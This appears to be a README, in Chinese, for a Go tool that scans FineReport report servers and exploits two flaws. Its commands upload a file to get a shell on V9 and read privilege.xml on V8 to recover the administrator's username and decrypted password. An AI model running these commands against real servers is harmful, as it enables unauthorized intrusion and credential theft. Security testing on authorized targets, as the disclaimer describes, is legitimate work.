Awesome
FineReportExploit
基于go语言的帆软报表漏洞检测工具
编译
go build -o FineReportExploit main.go
漏洞扫描
./FineReportExploit VulScan -u http://xxx.xxx.xxx.xxx
漏洞利用
V9Getshell
帆软V9 文件上传漏洞
./FineReportExploit V9Getshell -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端文件名
CNVD201804757
帆软V8任意文件读取漏洞
./FineReportExploit CNVD201804757 -u http://xxx.xxx.xxx.xxx
如果存在漏洞,那么读取privilege.xml,返回管理员用户名和解密后的密码
免责声明
本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。 如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果。